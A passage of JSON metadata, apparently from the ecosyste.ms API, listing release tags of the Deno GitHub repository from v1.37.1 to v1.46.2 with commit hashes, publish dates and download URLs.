gs/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.